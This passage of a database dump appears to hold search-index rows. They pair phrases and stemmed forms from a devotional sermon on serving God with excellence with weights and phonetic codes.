(315392, 'blood.”', 'blood.”', 0, 0, 0.4667, 'B430', 1, '*'),
(315393, 'bring excellence', 'bring excellence', 0, 1, 1.5333, 'B652452', 1, '*'),
(315394, 'bring excellence and', 'bring excellence and', 0, 1, 1.6667, 'B65245253', 1, '*'),
(315395, 'bringing to', 'bring to', 0, 1, 1.3667, 'B652523', 1, '*'),
(315396, 'bringing to god', 'bring to god', 0, 1, 1.5, 'B65252323', 1, '*'),
(315397, 'brought strange', 'brought strange', 0, 1, 1.5, 'B62323652', 1, '*'),
(315398, 'brought strange fire', 'brought strange fire', 0, 1, 1.6667, 'B6232365216', 1, '*'),
(315399, 'but at his', 'but at his', 0, 1, 1.3333, 'B320', 1, '*'),
(315400, 'but he will', 'but he will', 0, 1, 1.3667, 'B340', 1, '*'),
(315401, 'but his not', 'but his not', 0, 1, 1.3667, 'B3253', 1, '*'),
(315402, 'but not', 'but not', 0, 1, 1.2333, 'B353', 1, '*'),
(315403, 'but not at', 'but not at', 0, 1, 1.3333, 'B353', 1, '*'),
(315404, 'but to fear', 'but to fear', 0, 1, 1.3667, 'B316', 1, '*'),
(315405, 'cain from', 'cain from', 0, 1, 1.3, 'C5165', 1, '*'),
(315406, 'cain from abel', 'cain from abel', 0, 1, 1.4667, 'C516514', 1, '*'),
(315407, 'cain\'s', 'cain', 0, 0, 0.4, 'C520', 1, '*'),
(315408, 'cain\'s because', 'cain because', 0, 1, 1.4667, 'C5212', 1, '*'),
(315409, 'cain\'s because of', 'cain because of', 0, 1, 1.5667, 'C52121', 1, '*'),
(315410, 'came to god', 'came to god', 0, 1, 1.3667, 'C5323', 1, '*'),
(315411, 'capacity that he', 'capac that he', 0, 1, 1.5333, 'C123', 1, '*'),
(315412, 'careless attitude', 'careless attitude', 0, 1, 1.5667, 'C6423', 1, '*'),
(315413, 'careless attitude in', 'careless attitude in', 0, 1, 1.6667, 'C64235', 1, '*'),
(315414, 'carelessly', 'carelessli', 0, 0, 0.6667, 'C6424', 1, '*'),
(315415, 'carelessly deut', 'carelessli deut', 0, 1, 1.5, 'C64243', 1, '*'),
(315416, 'carelessly deut 10', 'carelessli deut 10', 0, 1, 1.6, 'C64243', 1, '*'),
(315417, 'carelessly from', 'carelessli from', 0, 1, 1.5, 'C6424165', 1, '*'),
(315418, 'carelessly from our', 'carelessli from our', 0, 1, 1.6333, 'C64241656', 1, '*'),
(315419, 'come to god', 'come to god', 0, 1, 1.3667, 'C5323', 2, '*'),
(315420, 'come with', 'come with', 0, 1, 1.3, 'C530', 1, '*'),
(315421, 'come with honour', 'come with honour', 0, 1, 1.5333, 'C5356', 1, '*'),
(315422, 'convenience but', 'conveni but', 0, 1, 1.5, 'C515213', 1, '*'),
(315423, 'convenience but at', 'conveni but at', 0, 1, 1.6, 'C515213', 1, '*'),
(315424, 'costly', 'costli', 0, 0, 0.4, 'C340', 1, '*'),
(315425, 'costly way', 'costli way', 0, 1, 1.3333, 'C340', 1, '*'),
(315426, 'costly way they', 'costli way they', 0, 1, 1.5, 'C343', 1, '*'),
(315427, 'cursed be', 'curs be', 0, 1, 1.3, 'C6231', 1, '*'),
(315428, 'cursed be he', 'curs be he', 0, 1, 1.4, 'C6231', 1, '*'),
(315429, 'dearly beloved jeremiah', 'dearli beloved jeremiah', 0, 1, 1.7667, 'D641413265', 1, '*'),
(315430, 'deceitfully', 'deceitfulli', 0, 0, 0.7333, 'D2314', 1, '*'),
(315431, 'deceitfully and', 'deceitfulli and', 0, 1, 1.5, 'D231453', 1, '*'),
(315432, 'deceitfully and cursed', 'deceitfulli and cursed', 0, 1, 1.7333, 'D2314532623', 1, '*'),
(315433, 'demands bring', 'demand bring', 0, 1, 1.4333, 'D5321652', 1, '*'),
(315434, 'demands bring excellence', 'demand bring excellence', 0, 1, 1.8, 'D5321652452', 1, '*'),
(315435, 'details and', 'detail and', 0, 1, 1.3667, 'D4253', 1, '*'),
(315436, 'details and specifics', 'detail and specifics', 0, 1, 1.7, 'D425321212', 1, '*'),
(315437, 'deut 10', 'deut 10', 0, 1, 1.2333, 'D000', 1, '*'),
(315438, 'deut 10 vs', 'deut 10 vs', 0, 1, 1.3333, 'D120', 1, '*'),
(315439, 'divine standards generates', 'divin standards generates', 0, 1, 1.8667, 'D1523536325632', 1, '*'),
(315440, 'does not accept', 'doe not accept', 0, 1, 1.5, 'D253213', 1, '*'),
(315441, 'doeth the', 'doeth the', 0, 1, 1.3, 'D000', 1, '*'),
(315442, 'doeth the work', 'doeth the work', 0, 1, 1.4667, 'D620', 1, '*'),
(315443, 'doing him', 'do him', 0, 1, 1.3, 'D525', 1, '*'),
(315444, 'doing him a', 'do him a', 0, 1, 1.3667, 'D525', 1, '*'),
(315445, 'don', 'don', 0, 0, 0.2, 'D500', 1, '*'),
(315446, 'don t', 'don t', 0, 1, 1.1667, 'D530', 1, '*'),
(315447, 'don t serve', 'don t serve', 0, 1, 1.3667, 'D53261', 1, '*'),
(315448, 'don\'t join', 'don join', 0, 1, 1.3333, 'D5325', 1, '*'),
(315449, 'don\'t join the', 'don join the', 0, 1, 1.4667, 'D53253', 1, '*'),
(315450, 'don\'t serve', 'don serve', 0, 1, 1.3667, 'D53261', 1, '*'),
(315451, 'don\'t serve god', 'don serve god', 0, 1, 1.5, 'D5326123', 1, '*'),
(315452, 'don\'t serve him', 'don serve him', 0, 1, 1.5, 'D532615', 1, '*'),
(315453, 'doth the lord', 'doth the lord', 0, 1, 1.4333, 'D463', 1, '*'),
(315454, 'either spiritual', 'either spiritual', 0, 1, 1.5333, 'E3621634', 1, '*'),
(315455, 'either spiritual or', 'either spiritual or', 0, 1, 1.6333, 'E36216346', 1, '*'),
(315456, 'every capacity', 'everi capacity', 0, 1, 1.4667, 'E162123', 1, '*'),
(315457, 'every capacity that', 'everi capacity that', 0, 1, 1.6333, 'E162123', 1, '*'),
(315458, 'excellence and', 'excel and', 0, 1, 1.4667, 'E245253', 1, '*'),
(315459, 'excellence and honour', 'excel and honour', 0, 1, 1.7, 'E24525356', 1, '*'),
(315460, 'excellence and order', 'excel and order', 0, 1, 1.6667, 'E245253636', 1, '*'),
(315461, 'favour serve', 'favour serve', 0, 1, 1.4, 'F6261', 1, '*'),
(315462, 'favour serve him', 'favour serve him', 0, 1, 1.5333, 'F62615', 1, '*'),
(315463, 'fire into', 'fire into', 0, 1, 1.3, 'F653', 1, '*'),
(315464, 'fire into his', 'fire into his', 0, 1, 1.4333, 'F6532', 1, '*'),
(315465, 'first truths', 'first truths', 0, 1, 1.4, 'F623632', 1, '*'),
(315466, 'first truths stated', 'first truths stated', 0, 1, 1.6333, 'F6236323', 1, '*'),
(315467, 'from abel', 'from abel', 0, 1, 1.3, 'F6514', 1, '*'),
(315468, 'from abel god', 'from abel god', 0, 1, 1.4333, 'F651423', 1, '*'),
(315469, 'from any man', 'from any man', 0, 1, 1.4, 'F650', 1, '*'),
(315470, 'from blood.”', 'from blood.”', 0, 1, 1.4, 'F65143', 1, '*'),
(315471, 'generates', 'gener', 0, 0, 0.6, 'G5632', 1, '*'),
(315472, 'generates the', 'gener the', 0, 1, 1.4333, 'G56323', 1, '*'),
(315473, 'generates the wrath', 'gener the wrath', 0, 1, 1.6333, 'G5632363', 1, '*'),
(315474, 'given you', 'given you', 0, 1, 1.3, 'G150', 1, '*'),
(315475, 'gives details', 'give details', 0, 1, 1.4333, 'G12342', 1, '*'),
(315476, 'gives details and', 'give details and', 0, 1, 1.5667, 'G1234253', 1, '*'),
(315477, 'god accepted', 'god accepted', 0, 1, 1.4, 'G3213', 1, '*'),
(315478, 'god accepted abel\'s', 'god accepted abel', 0, 1, 1.6333, 'G3213142', 1, '*'),
(315479, 'god accepts', 'god accepts', 0, 1, 1.3667, 'G32132', 1, '*'),
(315480, 'god accepts god', 'god accepts god', 0, 1, 1.5, 'G321323', 1, '*'),
(315481, 'god always wants', 'god always wants', 0, 1, 1.5333, 'G342532', 1, '*'),
(315482, 'god as if', 'god as if', 0, 1, 1.3, 'G321', 1, '*'),
(315483, 'god at', 'god at', 0, 1, 1.2, 'G300', 1, '*'),
(315484, 'god at the', 'god at the', 0, 1, 1.3333, 'G300', 1, '*'),
(315485, 'god carelessly', 'god carelessly', 0, 1, 1.4667, 'G326424', 1, '*'),
(315486, 'god carelessly deut', 'god carelessly deut', 0, 1, 1.6333, 'G3264243', 1, '*'),
(315487, 'god carelessly from', 'god carelessly from', 0, 1, 1.6333, 'G326424165', 1, '*'),
(315488, 'god either', 'god either', 0, 1, 1.3333, 'G360', 1, '*'),
(315489, 'god either spiritual', 'god either spiritual', 0, 1, 1.6667, 'G3621634', 1, '*'),
(315490, 'god god loves', 'god god loves', 0, 1, 1.4333, 'G323412', 1, '*'),
(315491, 'god has principles', 'god has principles', 0, 1, 1.6, 'G321652142', 1, '*'),
(315492, 'god hates to', 'god hates to', 0, 1, 1.4, 'G323', 1, '*'),
(315493, 'god loves us', 'god loves us', 0, 1, 1.4, 'G3412', 1, '*'),
(315494, 'god of details', 'god of details', 0, 1, 1.4667, 'G31342', 1, '*'),
(315495, 'god of excellence', 'god of excellence', 0, 1, 1.5667, 'G312452', 1, '*'),
(315496, 'god require', 'god require', 0, 1, 1.3667, 'G3626', 1, '*'),
(315497, 'god require of', 'god require of', 0, 1, 1.4667, 'G36261', 1, '*'),
(315498, 'god than', 'god than', 0, 1, 1.2667, 'G350', 1, '*'),
(315499, 'god than to', 'god than to', 0, 1, 1.3667, 'G353', 1, '*'),
(315500, 'god to walk', 'god to walk', 0, 1, 1.3667, 'G342', 1, '*'),
(315501, 'god wants men', 'god wants men', 0, 1, 1.4333, 'G35325', 1, '*'),
(315502, 'god wants us', 'god wants us', 0, 1, 1.4, 'G3532', 1, '*'),
(315503, 'god with all', 'god with all', 0, 1, 1.4, 'G340', 1, '*'),
(315504, 'god you need', 'god you need', 0, 1, 1.4, 'G353', 1, '*'),
(315505, 'group', 'group', 0, 0, 0.3333, 'G610', 1, '*'),
(315506, 'group of', 'group of', 0, 1, 1.2667, 'G610', 1, '*'),
(315507, 'group of people', 'group of people', 0, 1, 1.5, 'G614', 1, '*'),
(315508, 'has given you', 'ha given you', 0, 1, 1.4333, 'H215', 1, '*'),
(315509, 'has principles', 'ha principles', 0, 1, 1.4667, 'H21652142', 1, '*'),
(315510, 'has principles precepts', 'ha principles precepts', 0, 1, 1.7667, 'H21652142162132', 1, '*'),
(315511, 'hates to', 'hate to', 0, 1, 1.2667, 'H323', 1, '*'),
(315512, 'hates to be', 'hate to be', 0, 1, 1.3667, 'H3231', 1, '*'),
(315513, 'he gives details', 'he gives details', 0, 1, 1.5333, 'H212342', 1, '*'),
(315514, 'he smote', 'he smote', 0, 1, 1.2667, 'H253', 1, '*'),
(315515, 'he smote them', 'he smote them', 0, 1, 1.4333, 'H2535', 1, '*'),
(315516, 'he that doeth', 'he that doeth', 0, 1, 1.4333, 'H300', 1, '*'),
(315517, 'he that keepeth', 'he that keepeth', 0, 1, 1.5, 'H3213', 1, '*'),
(315518, 'he wants men', 'he wants men', 0, 1, 1.4, 'H5325', 1, '*'),
(315519, 'he will never', 'he will never', 0, 1, 1.4333, 'H4516', 1, '*'),
(315520, 'heart 02 07', 'heart 02 07', 0, 1, 1.3667, 'H630', 1, '*'),
(315521, 'heart and soul', 'heart and soul', 0, 1, 1.4667, 'H635324', 1, '*'),
(315522, 'heart and with', 'heart and with', 0, 1, 1.4667, 'H6353', 1, '*'),
(315523, 'highest', 'highest', 0, 0, 0.4667, 'H230', 1, '*'),
(315524, 'highest level', 'highest level', 0, 1, 1.4333, 'H23414', 1, '*'),
(315525, 'highest level of', 'highest level of', 0, 1, 1.5333, 'H234141', 1, '*'),
(315526, 'him a favour', 'him a favour', 0, 1, 1.4, 'H516', 1, '*'),
(315527, 'him and to', 'him and to', 0, 1, 1.3333, 'H530', 1, '*'),
(315528, 'him anyhow', 'him anyhow', 0, 1, 1.3333, 'H500', 1, '*'),
(315529, 'him anyhow god', 'him anyhow god', 0, 1, 1.4667, 'H523', 1, '*'),
(315530, 'him anyhow one', 'him anyhow one', 0, 1, 1.4667, 'H500', 1, '*'),
(315531, 'him but not', 'him but not', 0, 1, 1.3667, 'H51353', 1, '*'),
(315532, 'him don\'t', 'him don', 0, 1, 1.3, 'H5353', 1, '*'),
(315533, 'him don\'t serve', 'him don serve', 0, 1, 1.5, 'H5353261', 1, '*'),
(315534, 'him with all', 'him with all', 0, 1, 1.4, 'H534', 1, '*'),
(315535, 'his demands', 'hi demands', 0, 1, 1.3667, 'H23532', 1, '*'),
(315536, 'his demands bring', 'hi demands bring', 0, 1, 1.5667, 'H235321652', 1, '*'),
(315537, 'his not', 'hi not', 0, 1, 1.2333, 'H253', 1, '*'),
(315538, 'his not at', 'hi not at', 0, 1, 1.3333, 'H253', 1, '*'),
(315539, 'his presence and', 'hi presence and', 0, 1, 1.5333, 'H21625253', 1, '*'),
(315540, 'his sword', 'hi sword', 0, 1, 1.3, 'H263', 1, '*'),
(315541, 'his sword from', 'hi sword from', 0, 1, 1.4667, 'H263165', 1, '*'),
(315542, 'his ways', 'hi ways', 0, 1, 1.2667, 'H200', 1, '*'),
(315543, 'his ways and', 'hi ways and', 0, 1, 1.4, 'H253', 1, '*'),
(315544, 'honour the', 'honour the', 0, 1, 1.3333, 'H563', 1, '*'),
(315545, 'honour the lord', 'honour the lord', 0, 1, 1.5, 'H563463', 1, '*'),
(315546, 'how he wants', 'how he wants', 0, 1, 1.4, 'H532', 1, '*'),
(315547, 'in a very', 'in a very', 0, 1, 1.3, 'I516', 1, '*'),
(315548, 'in all his', 'in all his', 0, 1, 1.3333, 'I542', 1, '*'),
(315549, 'in service', 'in service', 0, 1, 1.3333, 'I52612', 1, '*'),
(315550, 'in service the', 'in service the', 0, 1, 1.4667, 'I526123', 1, '*'),
(315551, 'into his', 'into his', 0, 1, 1.2667, 'I532', 1, '*'),
(315552, 'into his presence', 'into his presence', 0, 1, 1.5667, 'I53216252', 1, '*'),
(315553, 'into your service', 'into your service', 0, 1, 1.5667, 'I5362612', 1, '*'),
(315554, 'is better', 'is better', 0, 1, 1.3, 'I2136', 1, '*'),
(315555, 'is better not', 'is better not', 0, 1, 1.4333, 'I213653', 1, '*'),
(315556, 'is the standard', 'is the standard', 0, 1, 1.5, 'I23235363', 1, '*'),
(315557, 'israel what', 'israel what', 0, 1, 1.3667, 'I2643', 1, '*'),
(315558, 'israel what doth', 'israel what doth', 0, 1, 1.5333, 'I2643', 1, '*'),
(315559, 'it is better', 'it is better', 0, 1, 1.4, 'I32136', 1, '*'),
(315560, 'item 56', 'item 56', 0, 1, 1.2333, 'I350', 1, '*'),
(315561, 'item 56 don', 'item 56 don', 0, 1, 1.3667, 'I3535', 1, '*'),
(315562, 'jeremiah 48', 'jeremiah 48', 0, 1, 1.3667, 'J650', 1, '*'),
(315563, 'jeremiah 48 vs', 'jeremiah 48 vs', 0, 1, 1.4667, 'J6512', 1, '*'),
(315564, 'join the group', 'join the group', 0, 1, 1.4667, 'J53261', 1, '*'),
(315565, 'just anything', 'just anything', 0, 1, 1.4333, 'J35352', 1, '*'),
(315566, 'just anything serving', 'just anything serving', 0, 1, 1.7, 'J353526152', 1, '*'),
(315567, 'k2 item 56', 'k2 item 56', 0, 1, 1.3333, 'K350', 1, '*'),
(315568, 'keepeth', 'keepeth', 0, 0, 0.4667, 'K130', 1, '*'),
(315569, 'keepeth back', 'keepeth back', 0, 1, 1.4, 'K1312', 1, '*'),
(315570, 'keepeth back his', 'keepeth back his', 0, 1, 1.5333, 'K1312', 1, '*'),
(315571, 'know that any', 'know that any', 0, 1, 1.4333, 'K535', 1, '*'),
(315572, 'level of seriousness', 'level of seriousness', 0, 1, 1.6667, 'L14126252', 1, '*'),
(315573, 'lord deceitfully', 'lord deceitfully', 0, 1, 1.5333, 'L632314', 1, '*'),
(315574, 'lord deceitfully and', 'lord deceitfully and', 0, 1, 1.6667, 'L63231453', 1, '*'),
(315575, 'lord thy', 'lord thy', 0, 1, 1.2667, 'L630', 1, '*'),
(315576, 'lord thy god', 'lord thy god', 0, 1, 1.4, 'L6323', 1, '*'),
(315577, 'lord told', 'lord told', 0, 1, 1.3, 'L6343', 1, '*'),
(315578, 'lord told me', 'lord told me', 0, 1, 1.4, 'L63435', 1, '*'),
(315579, 'love him', 'love him', 0, 1, 1.2667, 'L150', 1, '*'),
(315580, 'love him and', 'love him and', 0, 1, 1.4, 'L153', 1, '*'),
(315581, 'loves us', 'love us', 0, 1, 1.2667, 'L120', 1, '*'),
(315582, 'loves us but', 'love us but', 0, 1, 1.4, 'L1213', 1, '*'),
(315583, 'man god', 'man god', 0, 1, 1.2333, 'M230', 1, '*'),
(315584, 'man god always', 'man god always', 0, 1, 1.4667, 'M2342', 1, '*'),
(315585, 'me serious', 'me serious', 0, 1, 1.3333, 'M262', 1, '*'),
(315586, 'me serious i', 'me serious i', 0, 1, 1.4, 'M262', 1, '*'),
(315587, 'me years', 'me years', 0, 1, 1.2667, 'M620', 1, '*'),
(315588, 'me years ago', 'me years ago', 0, 1, 1.4, 'M620', 1, '*'),
(315589, 'mediocre service', 'mediocr service', 0, 1, 1.5333, 'M3262612', 1, '*'),
(315590, 'mediocre service from', 'mediocr service from', 0, 1, 1.7, 'M3262612165', 1, '*'),
(315591, 'men to serve', 'men to serve', 0, 1, 1.4, 'M3261', 1, '*'),
(315592, 'must come to', 'must come to', 0, 1, 1.4, 'M23253', 1, '*'),
(315593, 'must come with', 'must come with', 0, 1, 1.4667, 'M23253', 1, '*'),
(315594, 'my son i', 'my son i', 0, 1, 1.2667, 'M250', 1, '*'),
(315595, 'need to know', 'need to know', 0, 1, 1.4, 'N325', 1, '*'),
(315596, 'never accept', 'never accept', 0, 1, 1.4, 'N16213', 1, '*'),
(315597, 'never accept wrong', 'never accept wrong', 0, 1, 1.6, 'N16213652', 1, '*'),
(315598, 'not accept', 'not accept', 0, 1, 1.3333, 'N3213', 1, '*'),
(315599, 'not accept careless', 'not accept careless', 0, 1, 1.6333, 'N32132642', 1, '*'),
(315600, 'not accept just', 'not accept just', 0, 1, 1.5, 'N321323', 1, '*'),
(315601, 'not at', 'not at', 0, 1, 1.2, 'N300', 1, '*'),
(315602, 'not at our', 'not at our', 0, 1, 1.3333, 'N360', 1, '*'),
(315603, 'not at your', 'not at your', 0, 1, 1.3667, 'N360', 1, '*'),
(315604, 'not to serve', 'not to serve', 0, 1, 1.4, 'N3261', 1, '*'),
(315605, 'not up', 'not up', 0, 1, 1.2, 'N310', 1, '*'),
(315606, 'not up to', 'not up to', 0, 1, 1.3, 'N313', 1, '*'),
(315607, 'now israel', 'now israel', 0, 1, 1.3333, 'N264', 1, '*'),
(315608, 'now israel what', 'now israel what', 0, 1, 1.5, 'N2643', 1, '*'),
(315609, 'of aaron', 'of aaron', 0, 1, 1.2667, 'O165', 1, '*'),
(315610, 'of aaron understood', 'of aaron understood', 0, 1, 1.6333, 'O1653623', 1, '*'),
(315611, 'of details', 'of details', 0, 1, 1.3333, 'O1342', 1, '*'),
(315612, 'of details and', 'of details and', 0, 1, 1.4667, 'O134253', 1, '*'),
(315613, 'of excellence', 'of excellence', 0, 1, 1.4333, 'O12452', 1, '*'),
(315614, 'of excellence and', 'of excellence and', 0, 1, 1.5667, 'O1245253', 1, '*'),
(315615, 'of god god', 'of god god', 0, 1, 1.3333, 'O12323', 2, '*'),
(315616, 'of how he', 'of how he', 0, 1, 1.3, 'O100', 1, '*'),
(315617, 'of seriousness', 'of seriousness', 0, 1, 1.4667, 'O126252', 1, '*'),
(315618, 'of seriousness god', 'of seriousness god', 0, 1, 1.6, 'O1262523', 1, '*'),
(315619, 'of service', 'of service', 0, 1, 1.3333, 'O12612', 1, '*'),
(315620, 'of service that', 'of service that', 0, 1, 1.5, 'O126123', 1, '*'),
(315621, 'of the first', 'of the first', 0, 1, 1.4, 'O131623', 1, '*'),
(315622, 'of the standard', 'of the standard', 0, 1, 1.5, 'O13235363', 1, '*'),
(315623, 'of thee', 'of thee', 0, 1, 1.2333, 'O130', 1, '*'),
(315624, 'of thee but', 'of thee but', 0, 1, 1.3667, 'O1313', 1, '*'),
(315625, 'offering', 'offer', 0, 0, 0.5333, 'O1652', 1, '*'),
(315626, 'offering and', 'offer and', 0, 1, 1.4, 'O165253', 1, '*'),
(315627, 'offering and rejected', 'offer and rejected', 0, 1, 1.7, 'O165253623', 1, '*'),
(315628, 'or physical', 'or physical', 0, 1, 1.3667, 'O6124', 1, '*'),
(315629, 'or physical must', 'or physical must', 0, 1, 1.5333, 'O6124523', 1, '*'),
(315630, 'order he', 'order he', 0, 1, 1.2667, 'O636', 1, '*'),
(315631, 'order he does', 'order he does', 0, 1, 1.4333, 'O63632', 1, '*'),
(315632, 'our own', 'our own', 0, 1, 1.2333, 'O650', 1, '*'),
(315633, 'our own standard', 'our own standard', 0, 1, 1.5333, 'O65235363', 1, '*'),
(315634, 'own convenience', 'own convenience', 0, 1, 1.5, 'O525152', 1, '*'),
(315635, 'own convenience but', 'own convenience but', 0, 1, 1.6333, 'O52515213', 1, '*'),
(315636, 'own standard', 'own standard', 0, 1, 1.4, 'O5235363', 1, '*'),
(315637, 'own standard not', 'own standard not', 0, 1, 1.5333, 'O523536353', 1, '*'),
(315638, 'own time', 'own time', 0, 1, 1.2667, 'O535', 1, '*'),
(315639, 'own time but', 'own time but', 0, 1, 1.4, 'O53513', 1, '*'),
(315640, 'people that serve', 'peopl that serve', 0, 1, 1.5667, 'P43261', 1, '*'),
(315641, 'physical must', 'physic must', 0, 1, 1.4333, 'P24523', 1, '*'),
(315642, 'physical must come', 'physic must come', 0, 1, 1.6, 'P2452325', 1, '*'),
(315643, 'possession and', 'possess and', 0, 1, 1.4667, 'P253', 1, '*'),
(315644, 'possession and every', 'possess and every', 0, 1, 1.6667, 'P25316', 1, '*'),
(315645, 'precepts and', 'precept and', 0, 1, 1.4, 'P6213253', 1, '*'),
(315646, 'precepts and standard', 'precept and standard', 0, 1, 1.7, 'P6213253235363', 1, '*'),
(315647, 'presence and', 'presenc and', 0, 1, 1.4, 'P625253', 1, '*'),
(315648, 'presence and he', 'presenc and he', 0, 1, 1.5, 'P625253', 1, '*'),
(315649, 'principles precepts', 'principl precepts', 0, 1, 1.6333, 'P652142162132', 1, '*'),
(315650, 'principles precepts and', 'principl precepts and', 0, 1, 1.7667, 'P65214216213253', 1, '*'),
(315651, 'rejected', 'reject', 0, 0, 0.5333, 'R230', 1, '*'),
(315652, 'rejected cain\'s', 'reject cain', 0, 1, 1.5, 'R23252', 1, '*'),
(315653, 'rejected cain\'s because', 'reject cain because', 0, 1, 1.7667, 'R2325212', 1, '*'),
(315654, 'require', 'requir', 0, 0, 0.4667, 'R260', 3, '*'),
(315655, 'require of', 'requir of', 0, 1, 1.3333, 'R261', 1, '*'),
(315656, 'require of thee', 'requir of thee', 0, 1, 1.5, 'R2613', 1, '*'),
(315657, 'says and now', 'sai and now', 0, 1, 1.4, 'S535', 1, '*'),
(315658, 'says cursed', 'sai cursed', 0, 1, 1.3667, 'S623', 1, '*'),
(315659, 'says cursed be', 'sai cursed be', 0, 1, 1.4667, 'S6231', 1, '*'),
(315660, 'separated cain', 'separ cain', 0, 1, 1.4667, 'S16325', 1, '*'),
(315661, 'separated cain from', 'separ cain from', 0, 1, 1.6333, 'S16325165', 1, '*'),
(315662, 'serious god', 'seriou god', 0, 1, 1.3667, 'S623', 1, '*'),
(315663, 'serious god if', 'seriou god if', 0, 1, 1.4667, 'S6231', 1, '*'),
(315664, 'serious i', 'seriou i', 0, 1, 1.3, 'S620', 1, '*'),
(315665, 'serious i will', 'seriou i will', 0, 1, 1.4667, 'S624', 1, '*'),
(315666, 'seriousness god', 'serious god', 0, 1, 1.5, 'S62523', 1, '*'),
(315667, 'seriousness god does', 'serious god does', 0, 1, 1.6667, 'S625232', 1, '*'),
(315668, 'serious”.', 'serious”.', 0, 0, 0.6, 'S620', 1, '*'),
(315669, 'serious”. your', 'serious”. your', 0, 1, 1.4667, 'S626', 1, '*'),
(315670, 'serious”. your service', 'serious”. your service', 0, 1, 1.7333, 'S6262612', 1, '*'),
(315671, 'serve god as', 'serv god as', 0, 1, 1.4, 'S61232', 1, '*'),
(315672, 'serve god carelessly', 'serv god carelessly', 0, 1, 1.6667, 'S612326424', 1, '*'),
(315673, 'serve god than', 'serv god than', 0, 1, 1.4667, 'S61235', 1, '*'),
(315674, 'serve him', 'serv him', 0, 1, 1.3, 'S615', 1, '*'),
(315675, 'serve him anyhow', 'serv him anyhow', 0, 1, 1.5333, 'S615', 1, '*'),
(315676, 'serve him but', 'serv him but', 0, 1, 1.4333, 'S61513', 1, '*'),
(315677, 'serve him don\'t', 'serv him don', 0, 1, 1.5, 'S615353', 1, '*'),
(315678, 'serve him with', 'serv him with', 0, 1, 1.4667, 'S6153', 1, '*'),
(315679, 'serve the', 'serv the', 0, 1, 1.3, 'S613', 2, '*'),
(315680, 'serve the lord', 'serv the lord', 0, 1, 1.4667, 'S613463', 1, '*'),
(315681, 'served', 'serv', 0, 0, 0.4, 'S613', 1, '*'),
(315682, 'served anyhow', 'serv anyhow', 0, 1, 1.4333, 'S6135', 1, '*'),
(315683, 'served anyhow that', 'serv anyhow that', 0, 1, 1.6, 'S61353', 1, '*'),
(315684, 'service any', 'servic any', 0, 1, 1.3667, 'S6125', 1, '*'),
(315685, 'service any service', 'servic any service', 0, 1, 1.6333, 'S61252612', 1, '*'),
(315686, 'service from', 'servic from', 0, 1, 1.4, 'S612165', 1, '*'),
(315687, 'service from any', 'servic from any', 0, 1, 1.5333, 'S612165', 1, '*'),
(315688, 'service must', 'servic must', 0, 1, 1.4, 'S612523', 1, '*'),
(315689, 'service must come', 'servic must come', 0, 1, 1.5667, 'S61252325', 1, '*'),
(315690, 'service not', 'servic not', 0, 1, 1.3667, 'S61253', 1, '*'),
(315691, 'service not up', 'servic not up', 0, 1, 1.4667, 'S612531', 1, '*'),
(315692, 'service that', 'servic that', 0, 1, 1.4, 'S6123', 1, '*'),
(315693, 'service that god', 'servic that god', 0, 1, 1.5333, 'S612323', 1, '*'),
(315694, 'service that you', 'servic that you', 0, 1, 1.5333, 'S6123', 1, '*'),
(315695, 'service the', 'servic the', 0, 1, 1.3667, 'S6123', 2, '*'),
(315696, 'service the two', 'servic the two', 0, 1, 1.5, 'S6123', 1, '*'),
(315697, 'serving god', 'serv god', 0, 1, 1.3667, 'S61523', 1, '*'),
(315698, 'serving god has', 'serv god has', 0, 1, 1.5, 'S615232', 1, '*'),
(315699, 'smote', 'smote', 0, 0, 0.3333, 'S530', 1, '*'),
(315700, 'smote them', 'smote them', 0, 1, 1.3333, 'S535', 1, '*'),
(315701, 'smote them god', 'smote them god', 0, 1, 1.4667, 'S53523', 1, '*'),
(315702, 'so don\'t serve', 'so don serve', 0, 1, 1.4667, 'S353261', 1, '*'),
(315703, 'son i', 'son i', 0, 1, 1.1667, 'S500', 1, '*'),
(315704, 'son i am', 'son i am', 0, 1, 1.2667, 'S500', 1, '*'),
(315705, 'sons of', 'son of', 0, 1, 1.2333, 'S521', 1, '*'),
(315706, 'sons of aaron', 'son of aaron', 0, 1, 1.4333, 'S52165', 1, '*'),
(315707, 'soul don\'t', 'soul don', 0, 1, 1.3333, 'S4353', 1, '*'),
(315708, 'soul don\'t join', 'soul don join', 0, 1, 1.5, 'S435325', 1, '*'),
(315709, 'soul.”', 'soul.”', 0, 0, 0.4, 'S400', 1, '*'),
(315710, 'soul.” god', 'soul.” god', 0, 1, 1.3333, 'S423', 1, '*'),
(315711, 'soul.” god wants', 'soul.” god wants', 0, 1, 1.5333, 'S423532', 1, '*'),
(315712, 'specifics', 'specif', 0, 0, 0.6, 'S1212', 1, '*'),
(315713, 'specifics he', 'specif he', 0, 1, 1.4, 'S1212', 1, '*'),
(315714, 'specifics he gives', 'specif he gives', 0, 1, 1.6, 'S121212', 1, '*'),
(315715, 'specifics of', 'specif of', 0, 1, 1.4, 'S12121', 1, '*'),
(315716, 'specifics of how', 'specif of how', 0, 1, 1.5333, 'S12121', 1, '*'),
(315717, 'spiritual or', 'spiritu or', 0, 1, 1.4, 'S16346', 1, '*'),
(315718, 'spiritual or physical', 'spiritu or physical', 0, 1, 1.7, 'S16346124', 1, '*'),
(315719, 'standard and attitude', 'standard and attitude', 0, 1, 1.7, 'S3536353', 1, '*'),
(315720, 'standard not', 'standard not', 0, 1, 1.4, 'S3536353', 1, '*'),
(315721, 'standard not at', 'standard not at', 0, 1, 1.5, 'S3536353', 1, '*'),
(315722, 'standard of', 'standard of', 0, 1, 1.3667, 'S353631', 1, '*'),
(315723, 'standard of service', 'standard of service', 0, 1, 1.6333, 'S3536312612', 1, '*'),
(315724, 'standard so don\'t', 'standard so don', 0, 1, 1.5667, 'S353632353', 1, '*'),
(315725, 'standards generates', 'standard generates', 0, 1, 1.6333, 'S3536325632', 1, '*'),
(315726, 'standards generates the', 'standard generates the', 0, 1, 1.7667, 'S35363256323', 1, '*'),
(315727, 'stated', 'state', 0, 0, 0.4, 'S300', 1, '*'),
(315728, 'stated in', 'state in', 0, 1, 1.3, 'S350', 1, '*'),
(315729, 'stated in the', 'state in the', 0, 1, 1.4333, 'S353', 1, '*'),
(315730, 'strange fire', 'strang fire', 0, 1, 1.4, 'S365216', 1, '*'),
(315731, 'strange fire into', 'strang fire into', 0, 1, 1.5667, 'S36521653', 1, '*'),
(315732, 'sword from', 'sword from', 0, 1, 1.3333, 'S63165', 1, '*'),
(315733, 'sword from blood.”', 'sword from blood.”', 0, 1, 1.6, 'S63165143', 1, '*'),
(315734, 't', 't', 0, 0, 0.0667, 'T000', 2, '*'),
(315735, 't serve', 't serve', 0, 1, 1.2333, 'T261', 1, '*'),
